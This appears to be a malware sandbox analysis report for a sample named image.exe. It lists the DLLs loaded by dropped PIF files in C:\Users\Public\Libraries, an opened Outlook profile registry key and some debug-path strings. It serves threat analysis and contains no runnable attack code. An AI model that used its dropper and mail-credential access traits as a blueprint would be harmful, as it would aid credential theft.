Source: C:\Users\Public\Libraries\nhpoymuP.pif	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: version.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: url.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: ??????????.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: ????.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: ???e???????????.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: ???e???????????.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: tquery.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: spp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: spp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: spp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: sppwmi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: sppcext.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: winscard.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Section loaded: version.dll	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: version.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: uxtheme.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: url.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: ieframe.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: iertutil.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: netapi32.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: userenv.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: winhttp.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: wkscli.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: netutils.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: smartscreenps.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: kernel.appcore.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: winmm.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: wininet.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: sspicli.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: windows.storage.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: wldp.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: profapi.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: ieproxy.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: ieproxy.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: ieproxy.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: mssip32.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: mssip32.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: mssip32.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: mswsock.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: iphlpapi.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: winnsi.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: ??????????.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: ???.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: ???.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: ???.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: ?.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: ?.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: ????.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: ???e???????????.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: ???e???????????.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: ?.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: ?.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: ?.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: ?.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: tquery.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: cryptdll.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: spp.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: vssapi.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: vsstrace.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: spp.dll
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Section loaded: vssapi.dll

Source: C:\Users\user\Desktop\image.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\Public\Libraries\nhpoymuP.pif

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: image.exe

Static file information: File size 2143232 > 1048576

Source:	Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: image.exe, 00000000.00000002.1741511764.0000000020B27000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000003.1702655270.000000007E8B0000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000002.1741511764.0000000020B5B000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000002.1746460570.000000007EB80000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000003.1703150557.000000002192E000.00000004.00000020.00020000.00000000.sdmp, image.exe, 00000000.00000003.1703150557.00000000218D1000.00000004.00000020.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000002.1861657650.0000000020AE0000.00000004.00001000.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000003.1825967766.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000002.1861657650.0000000020BAD000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb source: nhpoymuP.pif, 00000003.00000003.1932254507.000000002D812000.00000004.00000020.00020000.00000000.sdmp
